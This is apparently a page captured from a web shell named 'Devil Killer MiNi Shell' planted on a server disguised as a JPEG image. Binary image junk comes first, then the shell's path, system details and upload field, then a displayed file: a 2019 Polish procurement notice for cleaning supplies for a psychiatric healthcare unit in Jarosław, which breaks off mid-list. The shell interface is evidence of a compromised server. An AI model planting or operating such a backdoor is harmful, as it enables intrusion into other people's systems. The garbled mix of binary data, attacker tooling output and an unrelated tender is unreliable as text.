JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190402/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190402/532500-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 532500-N-2019 z dnia 2019-04-02 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Specjalistyczny Psychiatryczny Zespół Opieki Zdrowotnej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">dostawa profesjonalnych środków czystości do systemu sprzątania, ręczników papierowych, dozowników, drobnego sprzętu i dzierżawa stacjonarnych systemów dozowania.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Specjalistyczny Psychiatryczny Zespół Opieki Zdrowotnej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00000000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Kościuszki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">18</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">37-500</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Jarosław</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podkarpackie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">016 621-47-02</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">spzoz_jaroslaw@poczta.onet.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.spzoz.jaroslaw.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">www.spzoz.jaroslaw.pl</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Samodzielny Publiczny Zakład Opieki Zdrowotnej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.spzoz.jaroslaw.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.spzoz.jaroslaw.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty przesyłane pisemnie, pocztą</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Specjalistyczny Psychiatryczny Zespół Opieki Zdrowotnej ul. Kościuszki 18 37-500 Jarosław</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">dostawa profesjonalnych środków czystości do systemu sprzątania, ręczników papierowych, dozowników, drobnego sprzętu i dzierżawa stacjonarnych systemów dozowania.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">17/ZP/2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Opis: dostawa profesjonalnych środków czystości do systemu sprzątania.1.	Środek do mycia i pielęgnacji powierzchni zmywalnych (szkło, meble, marmur, pow. z tworzyw sztucznych) - 24 000 l roztworu roboczego 1)	czyści nie pozostawiając smug , nadaje miły zapach, posiada technologię neutralizacji nieprzyjemnych zapachów2)	kolor niebieski3)	nie wymaga ponownego mycia wodą4)	zawiera w swoim składzie etanol 10-20%,5)	neutralny chemicznie pH koncentratu 6,0 - 6,46)	opakowanie 1- 2 L z aplikatorem w kolorze preparatu w formie nakrętki dozującej odmierzającej dozę potrzebną na uzyskanie 10L roztworu o stężeniu przyjętym do kalkulacji.7)	niskie stężenie robocze w przedziale 0,1 - 0,2%8)	produkt nie może być sklasyfikowany jako niebezpieczny zgodnie z kryteriami dyrektywy 1999/45/WE9)	produkt sklasyfikowany i oznakowany zgodnie z rozporządzeniem (WE)nr1272/2008. 10)	dozowanie automatyczne2.	Środek do mycia i pielęgnacji powierzchni zmywalnych (szkło, meble, marmur, pow. z tworzyw sztucznych) - 600 000 l roztworu roboczego 1)	czyści nie pozostawiając smug , nadaje miły zapach, posiada technologię neutralizacji nieprzyjemnych zapachów2)	kolor niebieski3)	nie wymaga ponownego mycia wodą4)	zawiera w swoim składzie etanol 10-20%,5)	neutralny chemicznie pH koncentratu 6,0 - 6,46) opakowanie w formie worka w kartonie w kolorze preparatu o pojemności 1- 5 L stanowiące uzupełnienie do opakowania z poz. 17)	niskie stężenie robocze w przedziale 0,1 - 0,2%8) produkt nie może być sklasyfikowany jako niebezpieczny zgodnie z kryteriami dyrektywy 1999/45/WE9)	produkt sklasyfikowany i oznakowany zgodnie z rozporządzeniem (WE)nr1272/200810)	dozowanie automatyczne3.	Środek do mycia i pielęgnacji powierzchni zmywalnych (szkło, meble, marmur, pow. z tworzyw sztucznych) - 500 000 l roztworu roboczego 1)	- czyści nie pozostawiając smug , nadaje miły zapach, , posiada technologię neutralizacji nieprzyjemnych zapachów2)	- kolor niebieski3)	- nie wymaga ponownego mycia wodą4)	- zawiera w swoim składzie etanol 10-20%,5)	- pH koncentratu 6,0 - 6,46)	- opakowanie o pojemności 2,5- 3,0 L w formie jednorazowej saszetki stanowiącej jednorazowy wkład do stacji dozującej dostarczonej na czas umowy przez Wykonawcę7)	- niskie stężenie robocze w przedziale 0,1 - 0,2%8)	- produkt nie może być sklasyfikowany jako niebezpieczny zgodnie z kryteriami dyrektywy 1999/45/WE9) produkt sklasyfikowany i oznakowany zgodnie z rozporządzeniem (WE)nr1272/200810)	- dozowanie automatyczne4. Środek do codziennego mycia i pielęgnacji podłóg, w tym zabezpieczonych akrylami. - 24 000 l roztworu roboczego - 1.	przeznaczony do wszystkich powierzchni zmywalnych i zabezpieczonych akrylem2.	może być stosowany do maszyn czyszczących i do mycia ręcznego3.	pozostawia miły zapach, posiada technologię neutralizacji nieprzyjemnych zapachów4.	pH koncentratu 8,0 - 8,45.	kolor zielony6.	nie wymaga ponownego mycia wodą7.	zawiera w swoim składzie niejonowe środki powierzchniowo czynne (alkohol alkilowy alkoksylowany) 3-10%, niejonowe środki powierzchniowo czynne(alkohol(C13) etoksylowany (8-9EO)) 3-10% oraz Glutaral < 0,1%8.	opakowanie 1- 2 L z aplikatorem w kolorze preparatu w formie nakrętki dozującej odmierzającej dozę potrzebną na uzyskanie 10L roztworu o stężeniu przyjętym do kalkulacji9.	niskie stężenie robocze w przedziale 0,1 - 0,2%10.	produkt nie może być sklasyfikowany jako niebezpieczny zgodnie z kryteriami dyrektywy 1999/45/WE11.	produkt sklasyfikowany i oznakowany zgodnie z rozporządzeniem (WE)nr1272/200812.	dozowanie automatyczne13.	zaproponowany preparat powinien być zalecany do mycia podłóg zabezpieczonych powłoką akrylową z pozycji 105.	Środek do codziennego mycia i pielęgnacji podłóg, w tym zabezpieczonych akrylami. - 600 000 l roztworu roboczego1.	przeznaczony do wszystkich powierzchni zmywalnych i zabezpieczonych akrylem2.	może być stosowany do maszyn czyszczących i do mycia ręcznego3.	pozostawia miły zapach, posiada technologię neutralizacji nieprzyjemnych zapachów4.	pH koncentratu 8,0 - 8,45.	kolor zielony6.	nie wymaga ponownego mycia wodą7.	zawiera w swoim składzie niejonowe środki powierzchniowoczynne (alkohol alkilowy alkoksylowany) 3-10%, niejonowe środki powierzchniowoczynne(alkohol(C13) etoksylowany (8-9EO)) 3-10% oraz Glutaral < 0,1%8.	opakowanie w formie worka w kartonie w kolorze preparatu o pojemności 1- 5 L stanowiące uzupełnienie do opakowania z poz. 49.	niskie stężenie robocze w przedziale 0,1 - 0,2%10.	produkt nie może być sklasyfikowany jako niebezpieczny zgodnie z kryteriami dyrektywy 1999/45/WE11.	produkt sklasyfikowany i oznakowany zgodnie z rozporządzeniem (WE) nr1272/200812.	dozowanie automatyczne13.	zaproponowany preparat powinien być zalecany do mycia podłóg zabezpieczonych powłoką akrylową z pozycji 106.	Środek do codziennego mycia i pielęgnacji podłóg, w tym zabezpieczonych akrylami. - 500 000 l roztworu roboczego 1)	przeznaczony do wszystkich powierzchni zmywalnych i zabezpieczonych akrylem2)	może być stosowany do maszyn czyszczących i do mycia ręcznego3)	pozostawia miły zapach, posiada technologię neutralizacji nieprzyjemnych zapachów4)	pH koncentratu 8,0 - 8,45)	kolor zielony6)	nie wymaga ponownego mycia wodą7)	zawiera w swoim składzie niejonowe środki powierzchniowoczynne (alkohol alkilowy alkoksylowany) 3-10%, niejonowe środki powierzchniowoczynne(alkohol(C13) etoksylowany (8-9EO)) 3-10% oraz Glutaral < 0,1%8)	opakowanie o pojemności 2,5- 3,0 L w formie saszetki stanowiącej jednorazowy wkład do stacji dozującej dostarczonej na czas umowy przez Wykonawcę9)	niskie stężenie robocze w przedziale 0,1 - 0,2%10)	produkt nie może być sklasyfikowany jako niebezpieczny zgodnie z kryteriami dyrektywy 1999/45/WE11)	produkt sklasyfikowany i oznakowany zgodnie z rozporządzeniem (WE) nr1272/200812)	dozowanie automatyczne13)	zaproponowany preparat powinien być zalecany do mycia podłóg zabezpieczonych powłoką akrylową z pozycji 107. Środek myjący do urządzeń sanitarnych, usuwający resztki mydła, osady mineralne - 24 000 l roztworu roboczego - 1)	kwaśny preparat czyszczący do codziennego mycia powierzchni sanitarnych2)	zalecany do stosowania w warunkach twardej wody, bezpieczny dla armatury chromowej i stali nierdzewnej3)	posiada miły zapach4)	kolor czerwony5)	nie wymaga ponownego mycia wodą6)	zawiera w swoim składzie niejonowe środki powierzchniowoczynne(alkohol(C13) etoksylowany (8-9EO)) 10-20%7)	opakowanie 1- 2 L z aplikatorem w kolorze preparatu w formie nakrętki dozującej odmierzającej dozę potrzebną na uzyskanie 10L roztworu o stężeniu przyjętym do kalkulacji.8)	pH koncentratu 1,0 - 2,09)	produkt nie może być sklasyfikowany jako niebezpieczny zgodnie z kryteriami dyrektywy 1999/45/WE10)	produkt sklasyfikowany i oznakowany zgodnie z rozporządzeniem (WE) nr1272/200811)	niskie stężenie robocze w przedziale 0,1 - 0,2%12)	dozowanie automatyczne8.	Środek myjący do urządzeń sanitarnych, usuwający resztki mydła, osady mineralne - 600 000 l roztworu roboczego 1)	kwaśny preparat czyszczący do codziennego mycia powierzchni sanitarnych2)	zalecany do stosowania w warunkach twardej wody3)	posiada miły zapach4)	kolor czerwony5)	nie wymaga ponownego mycia wodą6)	zawiera w swoim składzie niejonowe środki powierzchniowoczynne(alkohol(C13) etoksylowany (8-9EO)) 10-20%7)	opakowanie w formie worka w kartonie w kolorze preparatu o pojemności 1- 5 L stanowiące uzupełnienie do opakowania z poz. 78)	pH koncentratu 1,5 - 2,09)	produkt nie może być sklasyfikowany jako niebezpieczny zgodnie z kryteriami dyrektywy 1999/45/WEa.	10.produkt sklasyfikowany i oznakowany zgodnie z rozporządzeniem (WE) nr1272/200810)	niskie stężenie robocze w przedziale 0,1 - 0,2%11)	12.dozowanie automatyczne9.	Środek myjący do urządzeń sanitarnych, usuwający resztki mydła, osady mineralne - 125.000 l roztworu roboczego1)	kwaśny preparat czyszczący do codziennego mycia powierzchni sanitarnych2)	zalecany do stosowania w warunkach twardej wody3)	posiada miły zapach4)	kolor czerwony5)	nie wymaga ponownego mycia wodą6)	zawiera w swoim składzie niejonowe środki powierzchniowoczynne(alkohol(C13) etoksylowany (8-9EO)) 10-20%7)	opakowanie o pojemności 2,5 - 3,0 L w formie saszetki stanowiącej jednorazowy wkład do stacji dozującej dostarczonej na czas umowy przez Wykonawcę8)	pH koncentratu 1,5 - 2,0produkt nie może być sklasyfikowany jako niebezpieczny zgodnie z kryteriami dyrektywy 1999/45/WE9)	produkt sklasyfikowany i oznakowany zgodnie z rozporządzeniem (WE) nr1272/2008 niskie stężenie robocze w przedziale 0,1 - 0,2%10)	dozowanie automatyczne10. Preparat do konserwacji i zabezpieczania podłóg z wykładzin PCV - 480 litrów 1)	przeznaczona dla placówek służby zdrowia2)	powłoka o bardzo dobrej odporności na działanie alkoholu i środków dezynfekcyjnych3)	zawierająca w swoim składzie - 1-(2-metoksypropoksy)propan-2-ol w przedziale 2-12%, ekstrakt z eukaliptusa <1,5% oraz wodorotlenek amonu <1,5%4)	antypoślizgowa, posiada przyjemny zapach eukaliptusa5)	odporna na zużycie w miejscach o dużym natężeniu ruchu6)	tworząca błyszczącą, elastyczną, odporną na zużycie warstwę ochronną7)	pH preparatu 8 - 8,48)	Preparat gotowy do użycia9)	Spełnia standardy ASTM D-2047 w zakresie współczynnika tarcia statycznego10)	Opakowanie 5L lub porównywalne.11.Środek do gruntownego czyszczenia posadzek i usuwania powłok - 200 litrów. Uniwersalny środek do gruntownego czyszczenia podłóg i usuwania powłok. Zawiera substancje aktywne umożliwiające bardzo szybkie rozpuszczanie i emulgowanie brudu oraz usuwanie starych past i powłok akrylowych i polimerowych. Produkt umożliwia bezpieczne stosowanie do wszystkich rodzajów podłóg w tym do wykładzin PCV i linoleum. 1)	Nisko pieniący.a.	zawierający w swoim składzie - 2-(2-butoksyetoksy) etanol 20-30%, Alkohol benzylowy 3-10%, p- kumenosulfonian sodu 3-10%, 2-aminoetanol 1-3%b.	pH preparatu 9,5- 10,0c.	opakowanie 5L lub porównywalne.12. Mleczko czyszczące do czyszczenia armatury kuchennej i łazienkowej, do powierzchni ze stali nierdzewnej i chromowej - 550 Litrów 1)	mleczko czyszczące o przyjemnym cytrynowym zapachu2)	posiada zdolność usuwania uporczywych zabrudzeń kuchennych i przebarwień3)	zawiera w swoim składzie mikro granulki, które wzmagają efekt czyszczenia nie powodując jednocześnie zarysowań wrażliwych powierzchni4)	kolor żółty5)	pH koncetratu ok. 116)	gęstość względna 1,20 g/cm37)	Opakowanie 1 - 2 L 13. Środek do konserwacji i zabezpieczenia powierzchni ze stali szlachetnej - 7,5 l. 1)	preparat do czyszczenia i zabezpieczania powierzchni ze stali nierdzewneji chromowej zawierający węglowodory alifatyczne i parafinę2)	powstrzymuje ponowne zabrudzenie powierzchni i utrudnia przywieranie cząstek oleju3)	na zabezpieczonej i wypolerowanej powierzchni pozostawia równomierny połysk, zapobiega przed powstaniem widocznych odcisków palców, plam z wody i tłuszczów4)	opakowanie 0,5L lub porównywalne z dołączonym spryskiwaczem do nanoszenia preparatu5)	pH preparatu 6,5 - 7,514. Środek do neutralizacji i usuwania nieprzyjemnych zapachów z kanalizacji - 20 l. 1)	płyn o świeżym zapachu, stanowiący połączenie kultur bakterii i związków powierzchniowo czynnych,2)	posiada właściwości czyszczące3)	zapobiega powstawaniu 